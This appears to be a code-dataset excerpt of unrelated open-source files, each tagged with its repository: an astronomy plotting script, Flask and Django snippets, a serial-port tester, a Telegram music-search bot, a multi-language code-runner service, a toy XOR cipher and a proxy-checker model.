'6a', '6b', '6c', '6d', '7', '8a', '8b', '9',
'a1a', 'a1b', 'a2', 'a3', 'a4'
],
required=True,
help="Specify what figure to produce."
)
parser.add_argument(
"-s",
"--save",
action="store_true",
default=False,
help=(
"Use this option to automatically save the figures "
"instead of displaying."
)
)
parser.add_argument(
"-f",
"--save-format",
default='png',
choices=['png', 'pdf'],
help=(
"Select the format the figure will be saved as."
)
)
args = parser.parse_args()
return args
def main() -> None:
"""The main function.
Returns:
None
"""
# numexpr.set_num_threads(2)
args = parse_args()
f_num = args.figure
if f_num == "1":
plot = RadioOpticalPlot(group_stellar=True)
fig = plot.generate_plot()
if f_num == "2":
plot = RadioOpticalPlot(group_stellar=True)
fig = plot.generate_plot(
meerkat=True, show_complete=True, square=True,
hide_line_labels=True
)
if f_num == "3":
plot = RadioOpticalPlot(group_stellar=True, group_agn=True)
fig = plot.generate_plot(
square=True, hide_line_labels=True, schematic_cover=True
)
if f_num == "4":
plot = RadioOpticalPlot(group_agn=True)
fig = plot.generate_plot(
square=True, hide_line_labels=True,
background=True, hide_arrow=True, zoom_plot="0.5,9e-3,2e9,1e3",
color_list=(
"Stellar: Star,Stellar: RS CVn,Stellar: Algol,"
"Stellar: Variable Star,Stellar: "
"Symbiotic,Stellar: YSO,Stellar: Other,CV"
),
)
if f_num == "5a":
plot = RadioOpticalTrackPlot(group_agn=True, group_stellar=True)
fig = plot.generate_track_plot(
group_tracks=True, summary_style=True, hide_line_labels=True,
background=True, zoom_plot="1.43977e-5,0.00580767,111849,27519.4"
)
if f_num == "5b":
plot = RadioOpticalTrackPlot(group_agn=True, group_stellar=True)
fig = plot.generate_track_plot(
group_tracks=True, summary_style=True, hide_line_labels=True,
background=True, start_end_only=True,
zoom_plot="1.43977e-5,0.00580767,111849,27519.4"
)
if f_num == "6a":
plot = RadioOpticalTrackPlot(group_agn=True, group_stellar=True)
fig = plot.generate_track_plot(
hide_line_labels=True,
background=True,
zoom_plot="0.00653281,0.161976,6671.47,5035.9",
only_types=["XRB"],
hide_arrow=True,
hide_main_legend=True,
legend_size=15,
square=True
)
plot.add_text("XRBs", 1000, 2000, fontsize=30, weight='bold')
if f_num == "6b":
plot = RadioOpticalTrackPlot(group_agn=True, group_stellar=True)
fig = plot.generate_track_plot(
hide_line_labels=True,
background=True,
zoom_plot="1.74873,0.0457012,31154.5,108.112",
only_types=["CV"],
hide_arrow=True,
hide_main_legend=True,
legend_size=15,
square=True
)
plot.add_text("CVs", 2.5, 0.06, fontsize=30, weight='bold')
if f_num == "6c":
plot = RadioOpticalTrackPlot(group_agn=True, group_stellar=True)
fig = plot.generate_track_plot(
hide_line_labels=True,
background=True,
zoom_plot="0.00434,0.0710829,540.484,1028.08",
only_types=["SN"],
hide_arrow=True,
hide_main_legend=True,
legend_size=15,
square=True
)
plot.add_text("SNe", 100, 300, fontsize=30, weight='bold')
if f_num == "6d":
plot = RadioOpticalTrackPlot(group_agn=True, group_stellar=True)
fig = plot.generate_track_plot(
hide_line_labels=True,
background=True,
zoom_plot="1.52e-5,0.009319,17.2954,63.4996",
only_types=["GRB"],
hide_arrow=True,
hide_main_legend=True,
legend_size=15,
square=True
)
plot.add_text("GRBs", 0.00003, 0.013, fontsize=30, weight='bold')
if f_num == "7":
plot = RadioOpticalPlot(group_stellar=True, group_agn=True)
fig = plot.ratio_histogram()
if f_num == "8a":
plot = RadioOpticalPlot(
group_stellar=True, group_agn=True,
transients_file="Stripe82_QSOs.txt"
)
fig = plot.generate_plot(
background=True,
color_list="Quasar,GRB",
zoom_plot="5.4363e-5,0.0183888,362.768,5511.11",
hide_arrow=True,
hide_line_labels=True,
square=True
)
if f_num == "8b":
plot = RadioOpticalPlot(
group_stellar=True, group_agn=True
)
fig = plot.generate_plot(
background=True,
highlight_list="Quasar,Stellar",
hide_arrow=True,
hide_line_labels=True,
push_agn=True,
push_stellar_dist=1000,
square=True
)
if f_num == "9":
plot = RadioOpticalPlot(
group_stellar=True, group_agn=True,
transients_file="transient_master_table_04072013.txt"
)
fig = plot.generate_plot(
background=True,
hide_diag_line_labels=True,
exclude_type=(
'FIRST Quasar (SDSS Star),FIRST Quasar (SDSS Gal.),'
'PSR J1012+5307 (Variable)'
)
)
if f_num == "a1a":
plot = RadioOpticalPlot(group_stellar=True)
fig = plot.frequency_histogram()
if f_num == "a1b":
plot = RadioOpticalPlot(group_stellar=True)
fig = plot.band_histogram()
if f_num == "a2":
plot = RadioOpticalPlot()
fig = plot.qso_z_histogram()
if f_num == "a3":
plot = RadioOpticalPlot(group_stellar=True)
fig = plot.stellar_distance_histogram()
if f_num == "a4":
plot = RadioOpticalPlot(group_stellar=True)
fig = plot.grb_z_histogram()
if args.save:
save_name = f'ro_figure_{f_num}.{args.save_format}'
fig.savefig(
save_name, bbox_inches='tight'
)
print(f'Saved {save_name}.')
else:
plt.show()
if __name__ == '__main__':
main()
``` |
{
"source": "4piu/flask-example",
"score": 2
} |
#### File: flask-example/src/main.py
```python
import copy
import json
import os
import signal
import sys
import shared
def main():
# load config file and init globals
if len(sys.argv) > 1:
app_config_path = sys.argv[1]
elif os.getenv("ENV", "PROD") == "PROD":
app_config_path = "./app_config.yml"
else:
app_config_path = "./config/app_config.yml"
shared.init(config_file=app_config_path)
logger = shared.get_logger("main")
config = copy.deepcopy(shared.config)
if os.getenv("ENV", "PROD") == "PROD":
sensitive_keys = ["mysql_database", "mysql_user", "mysql_password"]
for key in sensitive_keys:
config[key] = "***"
logger.info(f"config loaded: \n{json.dumps(config, indent=2)}")
signal.signal(signal.SIGTERM, lambda s, f: os.kill(os.getpid(), signal.SIGINT))
import server
try:
server.run()
except KeyboardInterrupt:
logger.warning("SIGINT received, exit")
server.stop()
sys.exit(0)
if __name__ == "__main__":
main()
```
#### File: src/utility/Auth.py
```python
from shared import jwt_util
from utility.ApiException import *
class Auth:
valid_after: float = None
@staticmethod
def get_payload(request):
token = request.headers.get('Authorization')
if not token:
raise ApiPermissionException("Permission denied: not logged in")
token = str.replace(str(token), 'Bearer ', '')
try:
token_info = jwt_util.decode_token(token, audience='access')
except:
raise ApiPermissionException("Permission denied: invalid token")
if Auth.valid_after and token_info["role"] != "ADMIN" and token_info["iat"] < Auth.valid_after:
raise ApiPermissionException("Permission denied: expired token")
return token_info
``` |
{
"source": "4plus39/mysite",
"score": 2
} |
#### File: mysite/member/models.py
```python
from django.db import models
from django.utils import timezone
# Create your models here.
class Post(models.Model):
name = models.CharField(max_length=20)
number = models.CharField(max_length=10)
email = models.CharField(max_length=30)
created_date = models.DateTimeField(default=timezone.now)
updated_date = models.DateTimeField('更新時間', auto_now=True)
def __str__(self):
return self.name
``` |
{
"source": "4plus39/py-serial-test",
"score": 3
} |
#### File: 4plus39/py-serial-test/main.py
```python
import os
import keyboard
import time
import testio
import record
from const import *
def pause():
try:
input("\n Press the <ENTER> key to continue...")
except SyntaxError:
pass
clear_screen()
def clear_screen():
if ser.system.lower() == "linux":
os.system("clear")
elif ser.system.lower() == "windows":
os.system("cls")
def testing():
rec.timer_start()
while not keyboard.is_pressed('q'):
ser.send()
rec.cnt += 1
if not ser.read():
clear_screen()
print("----------------------------")
print(" Status: FAILED ")
rec.fcnt += 1
else:
clear_screen()
print("----------------------------")
print(" Status: PASS ")
print("----------------------------")
print(" Serial port =", ser.name)
print(" Baud rate =", BAUD_RATE)
print(" Time out =", TIMEOUT)
print("----------------------------")
print(" Program is ongoing ", end='')
if int(time.time()) % 3 == 1:
print(".")
elif int(time.time()) % 3 == 2:
print("..")
else:
print("...")
print(" Press key 'Q' to quit")
rec.timer_end()
if __name__ == '__main__':
ser = testio.SerialPort(None)
rec = record.Log()
ser.scan()
ser.check()
clear_screen()
print("----------------------------------")
ser.list()
print("----------------------------------")
ser.input()
print('----------------------------------')
ser.config(BAUD_RATE, TIMEOUT)
if ser.port.is_open:
print(" Serial port [ %s ] is open" % ser.name)
pause()
testing()
ser.close()
rec.cfg_output(ser.name)
clear_screen()
if rec.end_ts is not None and rec.start_ts is not None:
rec.log_output(ser.name)
``` |
{
"source": "4-pm/TeleMusickAnywhere",
"score": 2
} |
#### File: 4-pm/TeleMusickAnywhere/index.py
```python
import telebot
from main import bot
def handler(event, _): # Функция для переадресаци запросов в func Yandex Cloud
message = telebot.types.Update.de_json(event['body'])
bot.process_new_updates([message])
return {
'statusCode': 200,
'body': '!',
}
```
#### File: 4-pm/TeleMusickAnywhere/main.py
```python
import os
from difflib import SequenceMatcher
import requests
import telebot
from telebot import types
from data import db_session
from data.songs import Song
from data.profile import Users
from image_ot_qr import QR_Operation
from speech import Recognition
db_session.global_init("db/musik.db") # подключаем сессию sqlalchemy
URL = "https://api.telegram.org/bot"
with open("keys/apikey") as f:
__APIKEY__ = f.readline()
with open("keys/paykey") as f:
__PAYKEY__ = f.readline()
bot = telebot.TeleBot(__APIKEY__)
users_step = {}
# словарь статусов пользователей (некий аналог динамического json файла)
# кнопки
find_musick = types.KeyboardButton("Найти музыку")
add_musick = types.KeyboardButton("Добавить музыку")
other = types.KeyboardButton("Еще")
user = types.KeyboardButton("Профиль")
profile_statistic = types.KeyboardButton("Статистика")
adv = types.KeyboardButton("Реклама")
text = types.KeyboardButton("Текст")
voice = types.KeyboardButton("Голос")
yes = types.KeyboardButton("Да")
eng = types.KeyboardButton("Английский")
rus = types.KeyboardButton("Русский")
back_button = types.KeyboardButton("Назад")
qr_button = types.KeyboardButton("QR код")
share = types.KeyboardButton("Поделиться")
# такая строка отвечает за тип обрабатывваемых
@bot.message_handler(content_types=["text",
"start"])
# соосбщений(эта за текст и команду старт)
def main(message):
if not message.from_user.id in users_step: # проверка на присутсвие в словаре
users_step[message.from_user.id] = "home"
db_sess = db_session.create_session()
user_table = db_sess.query(Users).filter(
Users.user_id == message.from_user.id).first() # проверяем наличие пользователя в бд
if user_table == None:
user_table = Users()
# устанавливаем базовые значения
user_table.user_id = message.chat.id
user_table.listen_statistic = '0'
user_table.add_statistic = '0'
user_table.ads_statistic = '0'
db_sess.add(user_table)
db_sess.commit()
if (message.text == "/start" or message.text == "Назад"): # выход домой (если нажали старт или назад)
users_step[message.from_user.id] = "home" # меняем местонахождение пользователя в словаре
markup = types.ReplyKeyboardMarkup(resize_keyboard=True) # стиль кнопок
markup.add(find_musick, add_musick, other) # добавляем кнопки
bot.send_message(message.chat.id, # отправлем сообщение
text="Привет, {0.first_name}! Я тестируюсь".format(message.from_user), reply_markup=markup)
# все последующие сточки делают тоже-самое, отличаясь кнопками и местоположением пользователя
elif (message.text == "Еще"):
users_step[message.from_user.id] = "other"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button, user, adv)
bot.send_message(message.chat.id, text="Дополнительные функции", reply_markup=markup)
elif (message.text == "Реклама"):
users_step[message.from_user.id] = "schearch_for_adv"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button)
bot.send_message(message.chat.id, text="Напишите название песни", reply_markup=markup)
elif (message.text == "Профиль"):
users_step[message.from_user.id] = "user"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(profile_statistic, back_button)
bot.send_message(message.chat.id,
text="{0.first_name}, Добро пожаловать в ваш профиль".format(
message.from_user), reply_markup=markup)
elif (message.text == "Статистика"):
users_step[message.from_user.id] = "profile_statistic"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button)
bot.send_message(message.chat.id,
text="{0.first_name}, Предоставляю вашу статистику:".format(
message.from_user), reply_markup=markup)
db_sess = db_session.create_session()
user_table = db_sess.query(Users).filter(Users.user_id == message.from_user.id).first()
make_photo = QR_Operation()
make_photo.statistic_image(user_table.user_id, user_table.listen_statistic, user_table.add_statistic, user_table.ads_statistic)
# рисуем статистику пользователя на специальном фоне
bot.send_photo(message.chat.id, open(f"pass/statistic-{user_table.user_id}.jpg", "rb"))
# отправляем статистику
os.remove(f"pass/statistic-{user_table.user_id}.jpg")
# удаляем ненужные файлы
elif (message.text == "Добавить музыку"):
users_step[message.from_user.id] = "musick_add"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button)
bot.send_message(message.chat.id,
text="{0.first_name}, Скинь сначала название, текст(можно саму. узнаваемую часть), затем фото и потом аудио в виде файла".format(
message.from_user), reply_markup=markup)
elif (message.text == "Найти музыку"):
users_step[message.from_user.id] = "musick_find"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.row(text)
markup.row(qr_button, voice)
markup.row(back_button)
bot.send_message(message.chat.id,
text="{0.first_name}, Выбери формат поиска".format(message.from_user), reply_markup=markup)
elif (message.text == "Текст"):
users_step[message.from_user.id] = "text"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button)
bot.send_message(message.chat.id,
text="{0.first_name}, Напиши название или часть текста песни".format(
message.from_user),
reply_markup=markup)
elif (message.text == "Голос"):
users_step[message.from_user.id] = "voice"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button, rus, eng)
bot.send_message(message.chat.id,
text="{0.first_name}, выбери язык".format(
message.from_user),
reply_markup=markup)
elif (message.text == "QR код"):
users_step[message.from_user.id] = "qr"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button)
bot.send_message(message.chat.id,
text="{0.first_name}, жду qr код".format(message.from_user),
reply_markup=markup)
elif (message.text == "Поделиться"):
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button)
db_sess = db_session.create_session()
result = db_sess.query(Song.qr).filter(Song.name == users_step[message.from_user.id]).first()
bot.send_photo(message.chat.id, open(result[0], "rb"))
elif message.text in ("Русский", "Английский") and users_step[message.from_user.id] == "voice": # Запуск поиска по тексту
if message.text == "Русский":
users_step[message.from_user.id] = "ru_RU"
else:
users_step[message.from_user.id] = "eng_ENG"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button)
bot.send_message(message.chat.id,
text="{0.first_name}, жду голосовое сообщение".format(message.from_user),
reply_markup=markup)
elif users_step[message.from_user.id] == "text": # Запуск поиска по тексту
send_message(message.chat.id, message.text, message)
elif users_step[message.from_user.id] == "schearch_for_adv": # Запуск поиска по тексту
db_sess = db_session.create_session()
result = list(db_sess.query(Song.photo, Song.song, Song.name).filter(Song.name == message.text).distinct())
if result:
users_step[message.from_user.id] = ["check_for_adv"] + list(result[0])
result = result[0]
requests.get(f'{URL}{__APIKEY__}/sendPhoto?chat_id={message.chat.id}&photo={result[0]}&caption={result[2]}')
requests.get(f"{URL}{__APIKEY__}/sendAudio?chat_id={message.chat.id}&audio={result[1]}")
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button, yes)
bot.send_message(message.chat.id,
text="{0.first_name}, это то что нужно?".format(message.from_user),
reply_markup=markup)
else:
bot.send_message(message.chat.id, # оно работает, осталось сделать поиск по таблице
text="Извините, ничего не нашлось")
elif users_step[message.from_user.id][0] == "check_for_adv" and (message.text == "Да"):
musik_adv = types.LabeledPrice(label='Реклама песни', amount=10000)
if __PAYKEY__.split(':')[1] == 'TEST':
bot.send_invoice(message.chat.id, title="Оплата", description=f"Реклама среди пользователей",
provider_token=__PAYKEY__, currency="rub",
is_flexible=False,
prices=[musik_adv,],
start_parameter='payment-test', invoice_payload="payload-test"
)
elif users_step[message.from_user.id] == "musick_add": # статус когда пользователь добавил название песни
users_step[message.from_user.id] = ["musick_add-text", message.text]
elif users_step[message.from_user.id][0] == "musick_add-text": # статус когда пользователь добавил название песни
users_step[message.from_user.id].append(message.text)
users_step[message.from_user.id][0] = "musick_add-image"
print(users_step)
@bot.message_handler(content_types=['voice'])
def get_voice(message):
if users_step[message.from_user.id] in ("ru_RU" ,"eng_ENG"):
file_info = bot.get_file(message.voice.file_id)
path = file_info.file_path
file_name = "pass/" + os.path.basename(path)
print(file_name)
doc = requests.get('https://api.telegram.org/file/bot{0}/{1}'.format(__APIKEY__, file_info.file_path))
with open(file_name, 'wb') as file:
file.write(doc.content)
x = Recognition(file_name, users_step[message.from_user.id])
result = x.get_audio_messages()
send_message(message.chat.id, result, message)
@bot.pre_checkout_query_handler(func=lambda query: True) # функция проверки прихода оплаты
def checkout(pre_checkout_query):
bot.answer_pre_checkout_query(pre_checkout_query.id, ok=True)
@bot.message_handler(content_types=['successful_payment']) # при успешной оплате
def payed(message):
bot.send_message(message.chat.id, "Спасибо за покупку")
db_sess = db_session.create_session()
result = list(db_sess.query(Users.user_id).distinct())[0]
names = users_step[message.from_user.id][1:]
for i in result:
requests.get(f'{URL}{__APIKEY__}/sendPhoto?chat_id={i}&photo={names[0]}&caption=Спонсорская песня: {names[2]}')
requests.get(f"{URL}{__APIKEY__}/sendAudio?chat_id={i}&audio={names[1]}")
@bot.message_handler(content_types=['photo']) # тут при отправке фото (не файл)
def image(message):
if message.from_user.id in users_step:
print(users_step[message.from_user.id][0])
# проверка на нахождение в нужом шаге, иначе могут сломать отправив фото в неположеном месте
if users_step[message.from_user.id][0] == "musick_add-image":
file_photo_id = message.photo[-1].file_id # достаем id фото
users_step[message.from_user.id].append(str(file_photo_id)) # добавляем рядом с шагом
users_step[message.from_user.id][0] = "musick_add-file" # и ставим следющий шаг
file_info = bot.get_file(message.photo[len(message.photo) - 1].file_id) # получаем файл
downloaded_file = bot.download_file(file_info.file_path) # скачиваем его
src = 'pass/' + file_photo_id + ".png" # даём имя
with open(src, 'wb') as new_file:
new_file.write(downloaded_file) # записываем
elif users_step[message.from_user.id] == "qr": # тестовое условие декода qr
file_info = bot.get_file(message.photo[len(message.photo) - 1].file_id)
downloaded_file = bot.download_file(file_info.file_path)
src = 'pass/' + message.photo[1].file_id + ".png"
with open(src, 'wb') as new_file:
new_file.write(downloaded_file)
dec = QR_Operation("pass/" + message.photo[1].file_id)
text_qr = dec.qr_decode()
os.remove("pass/" + message.photo[1].file_id + ".png")
db_sess = db_session.create_session()
if text_qr.isdigit():
result = list(db_sess.query(Song.gif, Song.song, Song.name).filter(Song.id == int(text_qr)).distinct())
else:
result = False
if result:
result = result[0]
bot.send_message(message.chat.id,
text=result[2].format(
message.from_user))
bot.send_animation(message.chat.id, open(result[0], 'rb'))
requests.get(f"{URL}{__APIKEY__}/sendAudio?chat_id={message.chat.id}&audio={result[1]}")
else:
bot.send_message(message.chat.id, # оно работает, осталось сделать поиск по таблице
text="Извините, ничего не нашлось")
@bot.message_handler(content_types=['audio']) # при отправке аудио (файл)
def doc(message):
if message.from_user.id in users_step:
if users_step[message.from_user.id][0] == "musick_add-file":
file = str(message.audio.file_id)
mus = Song() # тут добавление в таблцу происходит
mus.name = users_step[message.from_user.id][1] # подробнее смотрите в файле с классом
mus.photo = users_step[message.from_user.id][3]
first_directory = os.getcwd()
os.chdir('gif')
gif_in_directory = os.listdir()
if len(gif_in_directory) == 0:
song_id = '1'
else:
gif_in_directory = sorted(gif_in_directory, reverse=True)
song_id = str(int(gif_in_directory[0].split('-')[1].split('.')[0]) + 1) # ищем индекс последней песни
os.chdir(first_directory)
image_creator = QR_Operation(f'qr-{song_id}')
image_creator.make_gif(f'name-{song_id}', f'{users_step[message.from_user.id][-1]}') # создаём гиф с диском
print(f'name-{song_id}', f'{users_step[message.from_user.id][-1]}')
image_creator.qr_coder(song_id) # делаем базовый qr
image_creator.im_to_qr(f'pass/{users_step[message.from_user.id][-1]}') # кастомизируем его
os.remove(f'pass/qr-{song_id}-base.png')
mus.gif = f'gif/name-{song_id}.gif'
mus.qr = f"qr/qr-{song_id}.png"
mus.song = file
mus.text = users_step[message.from_user.id][2]
mus.author = message.from_user.id
db_sess = db_session.create_session() # собственно сессия
db_sess.add(mus) # вначале добавляем в сессию
db_sess.commit() # потом комитим обязательно
user_table = db_sess.query(Users).filter(Users.user_id == message.from_user.id).first()
user_table.add_statistic = str(int(user_table.add_statistic) + 1)
db_sess.commit()
bot.send_message(message.chat.id,
text="Успешно добавлено") # Никит, отправляй гиф и qr
def send_message(chat_id, name, message): # функция отправки нормального сообщения с песней
db_sess = db_session.create_session() # обязательно сессия для запросов
result = list(db_sess.query(Song.gif, Song.song).filter(Song.name == name).distinct()) # запрос поиска по названи
if result: # если нашли имя
result = result[0] # тут был список с кортежем
users_step[message.from_user.id] = name
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button, share)
bot.send_message(message.chat.id,
text=name.format(
message.from_user), reply_markup=markup)
bot.send_animation(message.chat.id, open(result[0], 'rb'))
requests.get(f"{URL}{__APIKEY__}/sendAudio?chat_id={chat_id}&audio={result[1]}")
db_sess = db_session.create_session()
user_table = db_sess.query(Users).filter(Users.user_id == message.from_user.id).first()
user_table.add_statistic += str(int(user_table.add_statistic) + 1)
db_sess.commit()
else:
song = ["", 0] # макс совпадение по умолчанию
result = list(db_sess.query(Song.text).distinct()) # все тексты песен
for i in result:
i = i[0]
s = SequenceMatcher(lambda x: x == " ", name, i) # функция ищющая пересечения в проц. соотношении
s = s.ratio()
if s > song[1]: # отбираем макс.
song[1] = s
song[0] = i
print(song)
result = list(db_sess.query(Song.gif, Song.song, Song.name).filter(
Song.text == song[0]).distinct()) # и ищем оставшееся по тексту
if result:
result = result[0]
users_step[message.from_user.id] = result[2]
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button, share)
bot.send_message(message.chat.id,
text=f"Совпадение {round(song[1], 1) * 100}% - {result[2]}", reply_markup=markup)
bot.send_animation(message.chat.id, open(result[0], 'rb'))
requests.get(f"{URL}{__APIKEY__}/sendAudio?chat_id={chat_id}&audio={result[1]}")
db_sess = db_session.create_session()
user_table = db_sess.query(Users).filter(Users.user_id == message.from_user.id).first()
user_table.add_statistic += str(int(user_table.add_statistic) + 1)
db_sess.commit()
else:
bot.send_message(message.chat.id,
text="Ничего не нашлось... Добавь эту песню нам в коллекцию") # ну тут понятно по контексту, если ничего ненашли
def run():
bot.polling(none_stop=True, interval=1) # это запускает и обновляем бота
if __name__ == "__main__":
run()
``` |
{
"source": "4po/Cours",
"score": 3
} |
#### File: Python/cryptage/cryptage_bin.py
```python
def oue (a,b):
if(a != b):
return 1
else:
return 0
def Crypte(Mess,Clef):
Mcrypte = []
for i in range(len(Mess)):
Mcrypte.append(oue(Mess[i],Clef[i]))
return Mcrypte
M = [0,1,1,0,1,0,1,0,1,1,0,1,0,1,0,0]
K = [1,0,1,0,1,1,0,0,0,0,0,1,1,1,1,1]
C = Crypte(M,K)
D = Crypte(C,K)
print(M)
print(C)
print(D)
``` |
{
"source": "4poc/rccvm",
"score": 2
} |
#### File: rccvm/rccvmd/app.py
```python
import flask
from flask import request, jsonify
from werkzeug.exceptions import default_exceptions
from werkzeug.exceptions import HTTPException
import json
import backend
# discovers and import backends
backend.load()
runner = backend.Runner()
app = flask.Flask(__name__)
def make_json_error(ex):
response = jsonify(error=type(ex).__name__, message=str(ex))
response.status_code = (ex.code
if isinstance(ex, HTTPException)
else 500)
return response
for code in default_exceptions.iterkeys():
app.error_handler_spec[None][code] = make_json_error
# Lists all available backends.
@app.route('/backends')
def list_backends():
return jsonify(**{'backends': [{
'name': x['name'],
'description': x['description']} for x in backend.registry]})
@app.route('/execute', methods=['POST'])
def execute():
result = runner.delegate(request.get_json(force=True))
return jsonify(**result)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000, debug=False)
```
#### File: rccvmd/backends/gcc.py
```python
from backend import BackendBase, registry
class GCCBackend(BackendBase):
def compile(self, argv=None, env={}):
if not argv: argv = ['gcc', 'main.c']
return self.popen(argv, env)
def run(self, argv=None, env={}):
if not argv: argv = ['./a.out']
return self.popen(argv, env)
registry.append({
'name': 'gcc',
'class': GCCBackend,
'description': 'The GNU C compiler'
})
```
#### File: rccvmd/backends/javascript.py
```python
from backend import BackendBase, registry
class JavaScriptBackend(BackendBase):
def compile(self, argv=None, env={}):
pass
def run(self, argv=None, env={}):
if not argv: argv = ['node', 'main.js']
return self.popen(argv, env)
registry.append({
'name': 'javascript',
'class': JavaScriptBackend,
'description': 'nodejs'
})
```
#### File: rccvmd/backends/python2.py
```python
from backend import BackendBase, registry
class Python2Backend(BackendBase):
def compile(self, argv=None, env={}):
pass
def run(self, argv=None, env={}):
if not argv: argv = ['python2', 'main.py']
return self.popen(argv, env)
registry.append({
'name': 'python2',
'class': Python2Backend,
'description': 'the general-purpose language'
})
``` |
{
"source": "4po/proxychecker",
"score": 3
} |
#### File: 4po/proxychecker/model.py
```python
from peewee import *
from playhouse.sqlite_ext import SqliteExtDatabase
db = SqliteExtDatabase('proxy.db')
db.connect()
class BaseModel(Model):
class Meta:
database = db
class Proxy(BaseModel):
PROTOCOL_HTTP = 'http'
PROTOCOL_SOCKS5 = 'socks5'
# 透明代理
TYPE_TRANSPARENT = 'transparent'
# 匿名代理
TYPE_ANONYMOUS = 'anonymous'
# 高匿代理
TYPE_ELITE = 'elite'
ip = CharField()
port = IntegerField()
protocol = CharField()
type = CharField()
# 最后验证时间
check_time = DateTimeField()
class Meta:
indexes = (
(('ip', 'port'), True),
)
def create():
db.create_tables([Proxy])
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.